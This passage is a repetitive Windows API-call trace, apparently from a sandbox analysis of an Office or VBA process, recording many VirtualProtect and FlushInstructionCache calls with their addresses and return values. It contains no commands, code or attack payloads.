(hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.070] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.071] GetCurrentProcess () returned 0xffffffff [0102.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.071] GetCurrentProcess () returned 0xffffffff [0102.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.071] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.072] GetCurrentProcess () returned 0xffffffff [0102.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.072] GetCurrentProcess () returned 0xffffffff [0102.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.072] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.072] GetCurrentProcess () returned 0xffffffff [0102.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.073] GetCurrentProcess () returned 0xffffffff [0102.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.073] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.073] GetCurrentProcess () returned 0xffffffff [0102.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.073] GetCurrentProcess () returned 0xffffffff [0102.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.073] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.074] GetCurrentProcess () returned 0xffffffff [0102.074] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.074] GetCurrentProcess () returned 0xffffffff [0102.074] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.074] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.075] GetCurrentProcess () returned 0xffffffff [0102.075] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.075] GetCurrentProcess () returned 0xffffffff [0102.075] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.075] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.075] GetCurrentProcess () returned 0xffffffff [0102.075] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.075] GetCurrentProcess () returned 0xffffffff [0102.075] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.075] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.076] GetCurrentProcess () returned 0xffffffff [0102.076] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.076] GetCurrentProcess () returned 0xffffffff [0102.076] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.076] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.077] GetCurrentProcess () returned 0xffffffff [0102.077] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.077] GetCurrentProcess () returned 0xffffffff [0102.077] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.077] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.077] GetCurrentProcess () returned 0xffffffff [0102.077] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.077] GetCurrentProcess () returned 0xffffffff [0102.077] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.078] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.078] GetCurrentProcess () returned 0xffffffff [0102.078] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.078] GetCurrentProcess () returned 0xffffffff [0102.078] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.078] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.079] GetCurrentProcess () returned 0xffffffff [0102.079] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.079] GetCurrentProcess () returned 0xffffffff [0102.079] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.079] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.080] GetCurrentProcess () returned 0xffffffff [0102.080] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.080] GetCurrentProcess () returned 0xffffffff [0102.080] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.080] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.081] GetCurrentProcess () returned 0xffffffff [0102.081] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.081] GetCurrentProcess () returned 0xffffffff [0102.081] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.081] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.082] GetCurrentProcess () returned 0xffffffff [0102.082] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.082] GetCurrentProcess () returned 0xffffffff [0102.082] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.082] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.082] GetCurrentProcess () returned 0xffffffff [0102.082] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.082] GetCurrentProcess () returned 0xffffffff [0102.082] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.082] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.083] GetCurrentProcess () returned 0xffffffff [0102.083] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.083] GetCurrentProcess () returned 0xffffffff [0102.083] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.083] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.084] GetCurrentProcess () returned 0xffffffff [0102.084] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.084] GetCurrentProcess () returned 0xffffffff [0102.084] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.084] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.084] GetCurrentProcess () returned 0xffffffff [0102.084] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.084] GetCurrentProcess () returned 0xffffffff [0102.085] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.085] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.085] GetCurrentProcess () returned 0xffffffff [0102.085] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.085] GetCurrentProcess () returned 0xffffffff [0102.085] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.085] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.086] GetCurrentProcess () returned 0xffffffff [0102.086] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.087] GetAsyncKeyState (vKey=3) returned 0 [0102.087] GetAsyncKeyState (vKey=3) returned 0 [0102.087] CRetailMalloc_Alloc () returned 0xc986928 [0102.087] memcpy (in: _Dst=0xcb65188, _Src=0x1977bc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.087] memcpy (in: _Dst=0xc986948, _Src=0x197824, _Size=0x18 | out: _Dst=0xc986948) returned 0xc986948 [0102.087] CRetailMalloc_Realloc () returned 0xc986928 [0102.087] CRetailMalloc_Free () returned 0x1 [0102.087] GetCurrentProcess () returned 0xffffffff [0102.087] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.088] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.088] GetCurrentProcess () returned 0xffffffff [0102.088] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.088] GetCurrentProcess () returned 0xffffffff [0102.088] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.088] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.089] GetCurrentProcess () returned 0xffffffff [0102.089] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.089] GetCurrentProcess () returned 0xffffffff [0102.089] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.089] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.090] GetCurrentProcess () returned 0xffffffff [0102.090] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.090] GetCurrentProcess () returned 0xffffffff [0102.090] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.090] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.090] GetCurrentProcess () returned 0xffffffff [0102.090] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.090] GetCurrentProcess () returned 0xffffffff [0102.090] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.090] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.091] GetCurrentProcess () returned 0xffffffff [0102.091] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.091] GetCurrentProcess () returned 0xffffffff [0102.091] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.091] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.092] GetCurrentProcess () returned 0xffffffff [0102.092] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.092] GetCurrentProcess () returned 0xffffffff [0102.092] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.092] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.092] GetCurrentProcess () returned 0xffffffff [0102.092] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.092] GetCurrentProcess () returned 0xffffffff [0102.092] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.092] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.093] GetCurrentProcess () returned 0xffffffff [0102.093] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.093] GetCurrentProcess () returned 0xffffffff [0102.093] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.093] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.094] GetCurrentProcess () returned 0xffffffff [0102.094] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.094] GetCurrentProcess () returned 0xffffffff [0102.094] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.094] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.094] GetCurrentProcess () returned 0xffffffff [0102.094] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.094] GetCurrentProcess () returned 0xffffffff [0102.095] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.095] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.099] GetCurrentProcess () returned 0xffffffff [0102.099] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.099] GetCurrentProcess () returned 0xffffffff [0102.099] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.099] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.100] GetCurrentProcess () returned 0xffffffff [0102.100] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.100] GetCurrentProcess () returned 0xffffffff [0102.100] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.100] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.100] GetCurrentProcess () returned 0xffffffff [0102.100] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.100] GetCurrentProcess () returned 0xffffffff [0102.100] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.100] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.101] GetCurrentProcess () returned 0xffffffff [0102.101] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.101] GetCurrentProcess () returned 0xffffffff [0102.101] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.101] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.102] GetCurrentProcess () returned 0xffffffff [0102.102] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.102] GetCurrentProcess () returned 0xffffffff [0102.102] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.102] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.102] GetCurrentProcess () returned 0xffffffff [0102.102] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.102] GetCurrentProcess () returned 0xffffffff [0102.102] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.103] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.103] GetCurrentProcess () returned 0xffffffff [0102.103] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.103] GetCurrentProcess () returned 0xffffffff [0102.103] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.103] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.104] GetCurrentProcess () returned 0xffffffff [0102.104] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.104] GetCurrentProcess () returned 0xffffffff [0102.104] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.104] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.104] GetCurrentProcess () returned 0xffffffff [0102.105] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.105] GetCurrentProcess () returned 0xffffffff [0102.105] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.105] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.105] GetCurrentProcess () returned 0xffffffff [0102.105] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.105] GetCurrentProcess () returned 0xffffffff [0102.105] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.105] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.106] GetCurrentProcess () returned 0xffffffff [0102.106] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.106] GetCurrentProcess () returned 0xffffffff [0102.106] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.106] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.107] GetCurrentProcess () returned 0xffffffff [0102.107] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.107] GetCurrentProcess () returned 0xffffffff [0102.107] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.107] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.107] GetCurrentProcess () returned 0xffffffff [0102.107] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.107] GetCurrentProcess () returned 0xffffffff [0102.107] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.107] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.108] GetCurrentProcess () returned 0xffffffff [0102.108] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.108] GetCurrentProcess () returned 0xffffffff [0102.108] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.108] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.109] GetCurrentProcess () returned 0xffffffff [0102.109] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.109] GetCurrentProcess () returned 0xffffffff [0102.109] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.109] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.110] GetCurrentProcess () returned 0xffffffff [0102.110] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.110] GetCurrentProcess () returned 0xffffffff [0102.110] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.110] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.111] GetCurrentProcess () returned 0xffffffff [0102.111] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.111] GetCurrentProcess () returned 0xffffffff [0102.111] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.111] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.112] GetCurrentProcess () returned 0xffffffff [0102.112] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.112] GetCurrentProcess () returned 0xffffffff [0102.112] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.112] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.112] GetCurrentProcess () returned 0xffffffff [0102.112] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.112] GetCurrentProcess () returned 0xffffffff [0102.112] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.113] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.113] GetCurrentProcess () returned 0xffffffff [0102.113] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.113] GetCurrentProcess () returned 0xffffffff [0102.113] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.113] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0102.114] GetCurrentProcess () returned 0xffffffff [0102.114] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.115] GetAsyncKeyState (vKey=3) returned 0 [0102.115] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.115] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.115] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.115] CRetailMalloc_Alloc () returned 0xc986988 [0102.115] memcpy (in: _Dst=0xcb65188, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.115] memcpy (in: _Dst=0xc9869a8, _Src=0x197724, _Size=0x18 | out: _Dst=0xc9869a8) returned 0xc9869a8 [0102.115] CRetailMalloc_Realloc () returned 0xc986988 [0102.115] CRetailMalloc_Free () returned 0x1 [0102.115] GetCurrentProcess () returned 0xffffffff [0102.116] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.116] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.116] GetCurrentProcess () returned 0xffffffff [0102.116] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.116] GetCurrentProcess () returned 0xffffffff [0102.116] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.116] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.117] GetCurrentProcess () returned 0xffffffff [0102.117] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.117] GetCurrentProcess () returned 0xffffffff [0102.117] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.117] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.118] GetCurrentProcess () returned 0xffffffff [0102.118] FlushInstructionCache (hProcess=0xffffffff, 